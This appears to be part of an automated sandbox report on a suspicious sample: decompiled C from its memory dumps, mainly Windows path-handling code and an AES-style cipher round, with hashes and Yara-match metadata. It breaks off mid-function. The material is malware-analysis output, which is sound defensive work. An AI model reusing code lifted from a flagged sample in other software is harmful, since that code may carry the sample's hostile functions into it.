                            				_t260 = _a16;
                            				_v564 = __edx;
                            				_v580 = _a8;
                            				_v572 = _t260;
                            				_v544 = _a20;
                            				if( *__edx <= 8) {
                            					L3:
                            					if(_t260 != 0) {
                            						 *_t260 = 0;
                            					}
                            					_t254 =  &_v532;
                            					_v588 = 0x208;
                            					if((_v548 & 0x00000001) != 0) {
                            						_v556 =  *_t315;
                            						_v552 = _t315[2];
                            						_t161 = E0174F232( &_v556);
                            						_t316 = _v556;
                            						_v540 = _t161;
                            						goto L17;
                            					} else {
                            						_t306 = 0x208;
                            						_t298 = _t315;
                            						_t316 = L01736E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                            						if(_t316 == 0) {
                            							L68:
                            							_t322 = 0xc0000033;
                            							goto L39;
                            						} else {
                            							while(_v581 == 0) {
                            								_t233 = _v588;
                            								if(_t316 > _t233) {
                            									_t234 = _v548;
                            									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                            										_t254 = L01734620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                            										if(_t254 == 0) {
                            											_t169 = 0xc0000017;
                            										} else {
                            											_t298 = _v564;
                            											_v588 = _t316;
                            											_t306 = _t316;
                            											_t316 = L01736E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                            											if(_t316 != 0) {
                            												continue;
                            											} else {
                            												goto L68;
                            											}
                            										}
                            									} else {
                            										goto L90;
                            									}
                            								} else {
                            									_v556 = _t316;
                            									 *((short*)(_t329 + 0x32)) = _t233;
                            									_v552 = _t254;
                            									if(_t316 < 2) {
                            										L11:
                            										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                            											_t161 = 5;
                            										} else {
                            											if(_t316 < 6) {
                            												L87:
                            												_t161 = 3;
                            											} else {
                            												_t242 = _t254[2] & 0x0000ffff;
                            												if(_t242 != 0x5c) {
                            													if(_t242 == 0x2f) {
                            														goto L16;
                            													} else {
                            														goto L87;
                            													}
                            													goto L101;
                            												} else {
                            													L16:
                            													_t161 = 2;
                            												}
                            											}
                            										}
                            									} else {
                            										_t243 =  *_t254 & 0x0000ffff;
                            										if(_t243 == 0x5c || _t243 == 0x2f) {
                            											if(_t316 < 4) {
                            												L81:
                            												_t161 = 4;
                            												goto L17;
                            											} else {
                            												_t244 = _t254[1] & 0x0000ffff;
                            												if(_t244 != 0x5c) {
                            													if(_t244 == 0x2f) {
                            														goto L60;
                            													} else {
                            														goto L81;
                            													}
                            												} else {
                            													L60:
                            													if(_t316 < 6) {
                            														L83:
                            														_t161 = 1;
                            														goto L17;
                            													} else {
                            														_t245 = _t254[2] & 0x0000ffff;
                            														if(_t245 != 0x2e) {
                            															if(_t245 == 0x3f) {
                            																goto L62;
                            															} else {
                            																goto L83;
                            															}
                            														} else {
                            															L62:
                            															if(_t316 < 8) {
                            																L85:
                            																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                            																goto L17;
                            															} else {
                            																_t250 = _t254[3] & 0x0000ffff;
                            																if(_t250 != 0x5c) {
                            																	if(_t250 == 0x2f) {
                            																		goto L64;
                            																	} else {
                            																		goto L85;
                            																	}
                            																} else {
                            																	L64:
                            																	_t161 = 6;
                            																	goto L17;
                            																}
                            															}
                            														}
                            													}
                            												}
                            											}
                            											goto L101;
                            										} else {
                            											goto L11;
                            										}
                            									}
                            									L17:
                            									if(_t161 != 2) {
                            										_t162 = _t161 - 1;
                            										if(_t162 > 5) {
                            											goto L18;
                            										} else {
                            											switch( *((intOrPtr*)(_t162 * 4 +  &M017345F8))) {
                            												case 0:
                            													_v568 = 0x16f1078;
                            													__eax = 2;
                            													goto L20;
                            												case 1:
                            													goto L18;
                            												case 2:
                            													_t163 = 4;
                            													goto L19;
                            											}
                            										}
                            										goto L41;
                            									} else {
                            										L18:
                            										_t163 = 0;
                            										L19:
                            										_v568 = 0x16f11c4;
                            									}
                            									L20:
                            									_v588 = _t163;
                            									_v564 = _t163 + _t163;
                            									_t306 =  *_v568 & 0x0000ffff;
                            									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                            									_v576 = _t265;
                            									if(_t265 > 0xfffe) {
                            										L90:
                            										_t322 = 0xc0000106;
                            									} else {
                            										if(_t321 != 0) {
                            											if(_t265 > (_t321[1] & 0x0000ffff)) {
                            												if(_v580 != 0) {
                            													goto L23;
                            												} else {
                            													_t322 = 0xc0000106;
                            													goto L39;
                            												}
                            											} else {
                            												_t177 = _t306;
                            												goto L25;
                            											}
                            											goto L101;
                            										} else {
                            											if(_v580 == _t321) {
                            												_t322 = 0xc000000d;
                            											} else {
                            												L23:
                            												_t173 = L01734620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                            												_t269 = _v592;
                            												_t269[2] = _t173;
                            												if(_t173 == 0) {
                            													_t322 = 0xc0000017;
                            												} else {
                            													_t316 = _v556;
                            													 *_t269 = 0;
                            													_t321 = _t269;
                            													_t269[1] = _v576;
                            													_t177 =  *_v568 & 0x0000ffff;
                            													L25:
                            													_v580 = _t177;
                            													if(_t177 == 0) {
                            														L29:
                            														_t307 =  *_t321 & 0x0000ffff;
                            													} else {
                            														_t290 =  *_t321 & 0x0000ffff;
                            														_v576 = _t290;
                            														_t310 = _t177 & 0x0000ffff;
                            														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                            															_t307 =  *_t321 & 0xffff;
                            														} else {
                            															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                            															L0175F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                            															_t329 = _t329 + 0xc;
                            															_t311 = _v580;
                            															_t225 =  *_t321 + _t311 & 0x0000ffff;
                            															 *_t321 = _t225;
                            															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                            																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                            															}
                            															goto L29;
                            														}
                            													}
                            													_t271 = _v556 - _v588 + _v588;
                            													_v580 = _t307;
                            													_v576 = _t271;
                            													if(_t271 != 0) {
                            														_t308 = _t271 & 0x0000ffff;
                            														_v588 = _t308;
                            														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                            															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                            															L0175F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                            															_t329 = _t329 + 0xc;
                            															_t213 =  *_t321 + _v576 & 0x0000ffff;
                            															 *_t321 = _t213;
                            															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                            																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                            															}
                            														}
                            													}
                            													_t272 = _v560;
                            													if(_t272 != 0) {
                            														 *_t272 = _t321;
                            													}
                            													_t306 = 0;
                            													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                            													_t275 = _v572;
                            													if(_t275 != 0) {
                            														_t306 =  *_t275;
                            														if(_t306 != 0) {
                            															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                            														}
                            													}
                            													_t181 = _v544;
                            													if(_t181 != 0) {
                            														 *_t181 = 0;
                            														 *((intOrPtr*)(_t181 + 4)) = 0;
                            														 *((intOrPtr*)(_t181 + 8)) = 0;
                            														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                            														if(_v540 == 5) {
                            															_t182 = E017152A5(1);
                            															_v588 = _t182;
                            															if(_t182 == 0) {
                            																E0172EB70(1, 0x18079a0);
                            																goto L38;
                            															} else {
                            																_v560 = _t182 + 0xc;
                            																_t185 = E0172AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                            																if(_t185 == 0) {
                            																	_t324 = _v588;
                            																	goto L97;
                            																} else {
                            																	_t306 = _v544;
                            																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                            																	 *(_t306 + 4) = _t282;
                            																	_v576 = _t282;
                            																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                            																	 *_t306 = _t325;
                            																	if( *_t282 == 0x5c) {
                            																		_t149 = _t325 - 2; // -2
                            																		_t283 = _t149;
                            																		 *_t306 = _t283;
                            																		 *(_t306 + 4) = _v576 + 2;
                            																		_t185 = _t283 & 0x0000ffff;
                            																	}
                            																	_t324 = _v588;
                            																	 *(_t306 + 2) = _t185;
                            																	if((_v548 & 0x00000002) == 0) {
                            																		L97:
                            																		asm("lock xadd [esi], eax");
                            																		if((_t185 | 0xffffffff) == 0) {
                            																			_push( *((intOrPtr*)(_t324 + 4)));
                            																			E017595D0();
                            																			L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                            																		}
                            																	} else {
                            																		 *(_t306 + 0xc) = _t324;
                            																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                            																	}
                            																	goto L38;
                            																}
                            															}
                            															goto L41;
                            														}
                            													}
                            													L38:
                            													_t322 = 0;
                            												}
                            											}
                            										}
                            									}
                            									L39:
                            									if(_t254 !=  &_v532) {
                            										L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                            									}
                            									_t169 = _t322;
                            								}
                            								goto L41;
                            							}
                            							goto L68;
                            						}
                            					}
                            					L41:
                            					_pop(_t317);
                            					_pop(_t323);
                            					_pop(_t255);
                            					return L0175B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                            				} else {
                            					_t299 = __edx[2];
                            					if( *_t299 == 0x5c) {
                            						_t256 =  *(_t299 + 2) & 0x0000ffff;
                            						if(_t256 != 0x5c) {
                            							if(_t256 != 0x3f) {
                            								goto L2;
                            							} else {
                            								goto L50;
                            							}
                            						} else {
                            							L50:
                            							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                            								goto L2;
                            							} else {
                            								_t251 = E01753D43(_t315, _t321, _t157, _v560, _v572, _t305);
                            								_pop(_t319);
                            								_pop(_t326);
                            								_pop(_t257);
                            								return L0175B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                            							}
                            						}
                            					} else {
                            						L2:
                            						_t260 = _v572;
                            						goto L3;
                            					}
                            				}
                            				L101:
                            			}
                            0x017342a7
                            0x017342ac
                            0x0177e22d
                            0x017342b2
                            0x017342b2
                            0x017342b9
                            0x017342bc
                            0x017342c2
                            0x017342ca
                            0x017342cd
                            0x017342cd
                            0x017342d4
                            0x0173433f
                            0x0173433f
                            0x017342d6
                            0x017342d6
                            0x017342d9
                            0x017342dd
                            0x017342eb
                            0x0177e23a
                            0x017342f1
                            0x01734305
                            0x0173430d
                            0x01734315
                            0x01734318
                            0x0173431f
                            0x01734322
                            0x0173432e
                            0x0173433b
                            0x0173433b
                            0x00000000
                            0x0173432e
                            0x017342eb
                            0x0173434c
                            0x0173434e
                            0x01734352
                            0x01734359
                            0x0173435e
                            0x01734361
                            0x0173436e
                            0x0173438a
                            0x0173438e
                            0x01734396
                            0x0173439e
                            0x017343a1
                            0x017343ad
                            0x017343bb
                            0x017343bb
                            0x017343ad
                            0x0173436e
                            0x017343bf
                            0x017343c5
                            0x01734463
                            0x01734463
                            0x017343ce
                            0x017343d5
                            0x017343d9
                            0x017343df
                            0x01734475
                            0x01734479
                            0x01734491
                            0x01734491
                            0x01734479
                            0x017343e5
                            0x017343eb
                            0x017343f4
                            0x017343f6
                            0x017343f9
                            0x017343fc
                            0x017343ff
                            0x017344e8
                            0x017344ed
                            0x017344f3
                            0x0177e247
                            0x00000000
                            0x017344f9
                            0x01734504
                            0x01734508
                            0x0173450f
                            0x0177e269
                            0x00000000
                            0x01734515
                            0x01734519
                            0x01734531
                            0x01734534
                            0x01734537
                            0x0173453e
                            0x01734541
                            0x0173454a
                            0x0177e255
                            0x0177e255
                            0x0177e25b
                            0x0177e25e
                            0x0177e261
                            0x0177e261
                            0x01734555
                            0x01734559
                            0x0173455d
                            0x0177e26d
                            0x0177e270
                            0x0177e274
                            0x0177e27a
                            0x0177e27d
                            0x0177e28e
                            0x0177e28e
                            0x01734563
                            0x01734563
                            0x01734569
                            0x01734569
                            0x00000000
                            0x0173455d
                            0x0173450f
                            0x00000000
                            0x017344f3
                            0x017343ff
                            0x01734405
                            0x01734405
                            0x01734405
                            0x017342ac
                            0x0173428c
                            0x01734282
                            0x01734407
                            0x0173440d
                            0x0177e2af
                            0x0177e2af
                            0x01734413
                            0x01734413
                            0x00000000
                            0x017341d4
                            0x00000000
                            0x017341c3
                            0x017341bd
                            0x01734415
                            0x01734415
                            0x01734416
                            0x01734417
                            0x01734429
                            0x0173416e
                            0x0173416e
                            0x01734175
                            0x01734498
                            0x0173449f
                            0x0177e12d
                            0x00000000
                            0x0177e133
                            0x00000000
                            0x0177e133
                            0x017344a5
                            0x017344a5
                            0x017344aa
                            0x00000000
                            0x017344bb
                            0x017344ca
                            0x017344d6
                            0x017344d7
                            0x017344d8
                            0x017344e3
                            0x017344e3
                            0x017344aa
                            0x0173417b
                            0x0173417b
                            0x0173417b
                            0x00000000
                            0x0173417b
                            0x01734175
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 558ddb306484f01b479be8bccc361b23d906dee0c8dd1cadb7bf24e3687aa9ec
                            • Instruction ID: e638c8447fa5b13e186be368df5b1c46e123f28e9b77a82d296cbaf8827c31d5
                            • Opcode Fuzzy Hash: 558ddb306484f01b479be8bccc361b23d906dee0c8dd1cadb7bf24e3687aa9ec
                            • Instruction Fuzzy Hash: 0AF17D716082118FDB28CF58C484A7AFBE1FF98714F14496EF986CB292E734D981CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 26%
                            			E00A82FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				void* _t273;
                            				signed int _t274;
                            				signed int _t282;
                            				signed int* _t358;
                            				signed int _t383;
                            				signed int* _t409;
                            				signed int _t429;
                            				signed int _t458;
                            				signed int _t478;
                            				signed int _t560;
                            				signed int _t603;
                            
                            				_t273 = __eax;
                            				asm("ror edi, 0x8");
                            				asm("rol edx, 0x8");
                            				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
                            				asm("ror ebx, 0x8");
                            				asm("rol edx, 0x8");
                            				_v20 = _t458;
                            				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
                            				asm("ror ebx, 0x8");
                            				asm("rol edx, 0x8");
                            				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
                            				asm("ror esi, 0x8");
                            				asm("rol edx, 0x8");
                            				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
                            				asm("ror edx, 0x10");
                            				asm("ror esi, 0x8");
                            				asm("rol esi, 0x8");
                            				_v24 = _t282;
                            				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
                            				asm("ror esi, 0x10");
                            				asm("ror ebx, 0x8");
                            				asm("rol ebx, 0x8");
                            				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
                            				asm("ror ebx, 0x8");
                            				asm("ror edi, 0x10");
                            				asm("rol edi, 0x8");
                            				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
                            				asm("ror edi, 0x10");
                            				asm("ror ebx, 0x8");
                            				asm("rol ebx, 0x8");
                            				_t409 =  &(__ecx[8]);
                            				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                            				_t478 = (_a4 >> 1) - 1;
                            				_a4 = _t478;
                            				if(_t478 != 0) {
                            					do {
                            						asm("ror edi, 0x10");
                            						asm("ror ebx, 0x8");
                            						asm("rol ebx, 0x8");
                            						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
                            						asm("ror edi, 0x10");
                            						asm("ror ebx, 0x8");
                            						asm("rol ebx, 0x8");
                            						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
                            						asm("ror ebx, 0x8");
                            						asm("ror edi, 0x10");
                            						asm("rol edi, 0x8");
                            						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
                            						asm("ror edi, 0x10");
                            						asm("ror edx, 0x8");
                            						asm("rol edx, 0x8");
                            						_v24 = _t383;
                            						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
                            						asm("ror edx, 0x10");
                            						asm("ror esi, 0x8");
                            						asm("rol esi, 0x8");
                            						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
                            						asm("ror esi, 0x10");
                            						asm("ror ebx, 0x8");
                            						asm("rol ebx, 0x8");
                            						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
                            						_v12 = _t560;
                            						asm("ror edi, 0x8");
                            						asm("ror ebx, 0x10");
                            						asm("rol ebx, 0x8");
                            						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
                            						asm("ror ebx, 0x10");
                            						asm("ror edi, 0x8");
                            						asm("rol edi, 0x8");
                            						_t409 =  &(_t409[8]);
                            						_t205 =  &_a4;
                            						 *_t205 = _a4 - 1;
                            						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                            					} while ( *_t205 != 0);
                            				}
                            				asm("ror ebx, 0x8");
                            				asm("rol edi, 0x8");
                            				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
                            				asm("ror ebx, 0x8");
                            				asm("rol edi, 0x8");
                            				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
                            				asm("ror ebx, 0x8");
                            				asm("rol edi, 0x8");
                            				_t358 = _a8;
                            				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
                            				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
                            				asm("ror ecx, 0x8");
                            				asm("rol edi, 0x8");
                            				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
                            				return _t274;
                            			}




















                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                            • Instruction ID: bea73097e51b29953919fb161d3b7c9a135c21e86e0bd43506f35c5f88b3017f
                            • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                            • Instruction Fuzzy Hash: 87026E73E547164FE720DE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E017420A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                            				signed int _v16;
                            				signed int _v20;
                            				signed char _v24;
                            				intOrPtr _v28;
                            				signed int _v32;
                            				void* _v36;
                            				char _v48;
                            				signed int _v52;
                            				signed int _v56;
                            				unsigned int _v60;
                            				char _v64;
                            				unsigned int _v68;
                            				signed int _v72;
                            				char _v73;
                            				signed int _v74;
                            				char _v75;
                            				signed int _v76;
                            				void* _v81;
                            				void* _v82;
                            				void* _v89;
                            				void* _v92;
                            				void* _v97;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed char _t128;
                            				void* _t129;
                            				signed int _t130;
                            				void* _t132;
                            				signed char _t133;
                            				intOrPtr _t135;
                            				signed int _t137;
                            				signed int _t140;
                            				signed int* _t144;
                            				signed int* _t145;
                            				intOrPtr _t146;
                            				signed int _t147;
                            				signed char* _t148;
                            				signed int _t149;
                            				signed int _t153;
                            				signed int _t169;
                            				signed int _t174;
                            				signed int _t180;
                            				void* _t197;
                            				void* _t198;
                            				signed int _t201;
                            				intOrPtr* _t202;
                            				intOrPtr* _t205;
                            				signed int _t210;
                            				signed int _t215;
                            				signed int _t218;
                            				signed char _t221;
                            				signed int _t226;
                            				char _t227;
                            				signed int _t228;
                            				void* _t229;
                            				unsigned int _t231;
                            				void* _t235;
                            				signed int _t240;
                            				signed int _t241;
                            				void* _t242;
                            				signed int _t246;
                            				signed int _t248;
                            				signed int _t252;
                            				signed int _t253;
                            				void* _t254;
                            				intOrPtr* _t256;
                            				intOrPtr _t257;
                            				unsigned int _t262;
                            				signed int _t265;
                            				void* _t267;
                            				signed int _t275;
                            
                            				_t198 = __ebx;
                            				_t267 = (_t265 & 0xfffffff0) - 0x48;
                            				_v68 = __ecx;
                            				_v73 = 0;
                            				_t201 = __edx & 0x00002000;
                            				_t128 = __edx & 0xffffdfff;
                            				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                            				_v72 = _t128;
                            				if((_t128 & 0x00000008) != 0) {
                            					__eflags = _t128 - 8;
                            					if(_t128 != 8) {
                            						L69:
                            						_t129 = 0xc000000d;
                            						goto L23;
                            					} else {
                            						_t130 = 0;
                            						_v72 = 0;
                            						_v75 = 1;
                            						L2:
                            						_v74 = 1;
                            						_t226 =  *0x1808714; // 0x0
                            						if(_t226 != 0) {
                            							__eflags = _t201;
                            							if(_t201 != 0) {
                            								L62:
                            								_v74 = 1;
                            								L63:
                            								_t130 = _t226 & 0xffffdfff;
                            								_v72 = _t130;
                            								goto L3;
                            							}
                            							_v74 = _t201;
                            							__eflags = _t226 & 0x00002000;
                            							if((_t226 & 0x00002000) == 0) {
                            								goto L63;
                            							}
                            							goto L62;
                            						}
                            						L3:
                            						_t227 = _v75;
                            						L4:
                            						_t240 = 0;
                            						_v56 = 0;
                            						_t252 = _t130 & 0x00000100;
                            						if(_t252 != 0 || _t227 != 0) {
                            							_t240 = _v68;
                            							_t132 = L01742EB0(_t240);
                            							__eflags = _t132 - 2;
                            							if(_t132 != 2) {
                            								__eflags = _t132 - 1;
                            								if(_t132 == 1) {
                            									goto L25;
                            								}
                            								__eflags = _t132 - 6;
                            								if(_t132 == 6) {
                            									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                            									if( *((short*)(_t240 + 4)) != 0x3f) {
                            										goto L40;
                            									}
                            									_t197 = L01742EB0(_t240 + 8);
                            									__eflags = _t197 - 2;
                            									if(_t197 == 2) {
                            										goto L25;
                            									}
                            								}
                            								L40:
                            								_t133 = 1;
                            								L26:
